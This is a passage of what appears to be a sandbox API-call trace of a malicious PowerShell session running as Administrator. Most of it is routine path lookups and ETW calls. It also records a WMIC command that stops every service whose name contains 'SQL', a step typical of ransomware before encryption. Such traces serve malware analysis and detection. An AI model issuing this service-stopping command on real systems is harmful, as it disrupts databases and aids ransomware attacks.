lpOldMode=0x8b0e7e8) returned 1 [0284.954] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0284.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0284.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0284.954] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0284.954] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0284.955] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0284.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0284.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0284.955] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0284.955] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0284.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0284.956] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0284.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0284.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0284.956] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0284.956] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0284.956] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0284.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0284.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0284.957] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0284.957] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0284.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0284.957] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0284.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0284.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0284.957] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0284.957] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0284.958] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0284.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0284.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0284.958] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0284.958] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0284.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0284.958] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0284.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0284.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0284.959] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0284.959] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0284.959] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0284.959] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0284.959] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0284.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0284.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0284.960] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0284.960] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x67, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.961] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.961] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x67, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x67, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.961] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0284.962] GetConsoleWindow () returned 0x302b8 [0284.966] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0284.966] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0284.967] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0284.967] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0284.968] CoTaskMemFree (pv=0x7e29450) [0284.969] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4e26348 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice", lpProcessInformation=0x4e26348*(hProcess=0xa58, hThread=0xa54, dwProcessId=0xe98, dwThreadId=0x4e4)) returned 1 [0284.986] CloseHandle (hObject=0xa54) returned 1 [0284.987] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0284.987] GetCurrentProcess () returned 0xffffffff [0284.987] GetCurrentProcess () returned 0xffffffff [0284.987] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xa58, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0xa54) returned 1 [0284.988] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0xa54, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0287.043] CloseHandle (hObject=0xa54) returned 1 [0287.044] GetExitCodeProcess (in: hProcess=0xa58, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0287.045] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0287.057] CloseHandle (hObject=0xa58) returned 1 [0287.057] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x67, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.059] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x67, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.059] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.059] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.059] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.059] SetEvent (hEvent=0xa38) returned 1 [0287.059] SetEvent (hEvent=0xa2c) returned 1 [0287.059] SetEvent (hEvent=0xa30) returned 1 [0287.060] SetEvent (hEvent=0xa34) returned 1 [0287.060] SetEvent (hEvent=0xa48) returned 1 [0287.060] SetEvent (hEvent=0xa3c) returned 1 [0287.060] SetEvent (hEvent=0xa40) returned 1 [0287.060] SetEvent (hEvent=0xa44) returned 1 [0287.060] SetEvent (hEvent=0xa50) returned 1 [0287.060] SetEvent (hEvent=0xa4c) returned 1 [0287.061] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0287.066] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0287.068] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x196e3d30, Data2=0x3583, Data3=0x4e75, Data4=([0]=0x90, [1]=0x95, [2]=0x3c, [3]=0x62, [4]=0xec, [5]=0x97, [6]=0xe7, [7]=0xa7))) returned 0x0 [0287.068] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=38210323110) returned 1 [0287.069] AmsiOpenSession () returned 0x0 [0287.069] AmsiScanString () returned 0x80070015 [0287.078] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=38211276079) returned 1 [0287.078] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0287.080] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.080] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.080] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.080] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.080] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.080] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x6e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0287.081] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0287.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0287.082] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0287.082] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0287.083] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0287.083] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0287.083] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0287.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0287.083] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0287.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0287.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0287.084] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0287.084] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0287.084] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0287.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0287.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0287.085] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0287.085] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0287.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0287.085] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0287.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0287.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0287.085] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0287.085] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0287.085] FindFirstFileW (in: 